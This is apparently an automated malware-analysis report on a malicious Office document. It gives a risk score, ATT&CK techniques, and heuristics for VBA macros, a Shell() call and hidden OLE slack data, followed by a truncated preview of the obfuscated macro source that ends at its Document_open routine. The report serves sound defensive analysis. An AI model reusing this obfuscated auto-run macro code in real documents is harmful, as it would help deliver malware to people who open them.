MALICIOUS
Risk Score: 162
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is an Office document with a high-severity OLE slack anomaly and a critical OLE_VBA_SHELL heuristic firing, indicating the presence of malicious VBA macros. The Document_Open macro is present, and the Shell() function is called, suggesting an attempt to execute arbitrary code. The VBA script is heavily obfuscated, but the presence of the Shell() call strongly implies it's designed to download and execute a second-stage payload.
Heuristics (5)
- VBA macros detected (medium, 2 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- OLE document has large unaccounted-for region (high) OLE_SLACK_ANOMALY: OLE file is 160,384 bytes but its declared streams total only 52,921 bytes — 107,463 bytes (67%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29534 bytes |
SHA-256: 1bf68875b137a1cc844bf647b923b5e0afc8f0781c79ffadbe68c97eef35856d
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "mVMLiwfHzQGmN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function DqGrcBsalmcUp()
On Error Resume Next
If HlPMG Xor 11 Then
ElseIf OfOpP Eqv dKPwb Then
If dWETnc = lBSAVo Then
GEzZJ = Oct(STdfwX * 41517)
End If
End If
If dBprN Xor 11 Then
ElseIf JEozm Eqv UAvftB Then
If KZNpmr = KtZXQG Then
RXRLd = Oct(rzzIbW * 4692)
End If
End If
If Truqnu Xor 11 Then
ElseIf ChnwNp Eqv LznMI Then
If DHznv = hVYKml Then
fHNTYB = Oct(AJrjzW * 52570)
End If
End If
If hACWV Xor 11 Then
ElseIf uQLDA Eqv OPfRhj Then
If DciTP = INaEOP Then
dqMYUt = Oct(QWHFIc * 78715)
End If
End If
If SDlhBr Xor 11 Then
ElseIf ZUYTz Eqv QiANH Then
If pimowS = NEKYwZ Then
rLLNl = Oct(woQlTI * 4604)
End If
End If
End Function
Private Function UQjFdMtH()
On Error Resume Next
If iKYVLU <= GqVAr Then
Set kLtVb = PJTpTl
cBNIv = (lWHuQ * aOIqz - zzfYku + qqkXL + 41045 - jmsFs)
End If
If tFsdQd <= BiGTT Then
Set VltERT = ERAzvZ
UnWCw = (WEunu * QwpIi - rcjzs + oYoVbF + 86446 - rSwNLD)
End If
If FIijw Xor 11 Then
ElseIf RVQivN Eqv fGJHRd Then
If kzCrO = lDlFoa Then
jQwqSw = Oct(tIwojS * 76101)
End If
End If
If MUdWBK Xor 11 Then
ElseIf JMziPK Eqv XtPQp Then
If XiZQp = EZBuU Then
iMWff = Oct(fmnSq * 97927)
End If
End If
If WRrGJ <= DzPIVu Then
Set zbWvh = ZbAco
NczAbw = (joFSFl * rVrFSj - ctrZSi + uaWoDM + 91927 - FwnMv)
End If
End Function
Private Function YSTjndVYH()
On Error Resume Next
If ADPCwX Xor 11 Then
ElseIf iznrGt Eqv QRDNo Then
If QJXBYV = uIRXLz Then
zhnLsi = Oct(ofPNp * 88771)
End If
End If
If flIGO Xor 11 Then
ElseIf VKjKBj Eqv GWWoiL Then
If utzfm = tYsjY Then
ioqwB = Oct(OModO * 97741)
End If
End If
If ttFjWc Xor 11 Then
ElseIf jNidpz Eqv jPjHT Then
If iirVF = cdHnia Then
wPXRb = Oct(wFAahO * 86621)
End If
End If
If wrcAmL Xor 11 Then
ElseIf NEqBc Eqv GCfLs Then
If RamjQS = CDQKnQ Then
sWVGC = Oct(uIDJn * 12894)
End If
End If
If tjFocE Xor 11 Then
ElseIf LLHLir Eqv AwuDk Then
If MjhZI = iJXdw Then
nwJUK = Oct(KMcjK * 25732)
End If
End If
If zzhib Xor 11 Then
ElseIf NPCki Eqv zOYZvC Then
If BKIwEi = MiDJG Then
QNiIG = Oct(zlkAV * 64745)
End If
End If
If CLdaX Xor 11 Then
ElseIf NBUSF Eqv CnmZGV Then
If dHTOq = QSwlCO Then
GIWdCF = Oct(nwMLwT * 46038)
End If
End If
End Function
Private Function wrzHrQbvhRSf()
On Error Resume Next
If sIzRMo Xor 11 Then
ElseIf LVLEh Eqv wIrdQJ Then
If IBTYu = FrPnK Then
OVqLd = Oct(ZKnNj * 88657)
End If
End If
If nCNhD Xor 11 Then
ElseIf ZalrpZ Eqv Ljjwh Then
If DSIHw = Hrzcu Then
ZhVNC = Oct(ikUbnk * 98644)
End If
End If
If OPoWC Xor 11 Then
ElseIf scGLwP Eqv FDCMMb Then
If mpHnU = dPBjzl Then
YnwHK = Oct(pjfTz * 18218)
End If
End If
If zNaHR Xor 11 Then
ElseIf toGiuQ Eqv vwZwr Then
If PsAzj = Nwjbi Then
IaKId = Oct(UcVjt * 29164)
End If
End If
If zpbolu Xor 11 Then
ElseIf cSQBIa Eqv DYTBSF Then
If oUQkE = jUanl Then
KZBFvG = Oct(AVYjF * 67510)
End If
End If
End Function
Private Sub Document_open()
On Error Resume Next
If ltMnWY Xor iCwVIY Then
For BkhpY = 22 To Jqsfr
kzNCb = 74081 * jwNaQ + dFUmZ + sImaK - jqihuB - vAocVz + jAobo - QluCp / 7684 / WzNwX / 6199 - rva
... (truncated)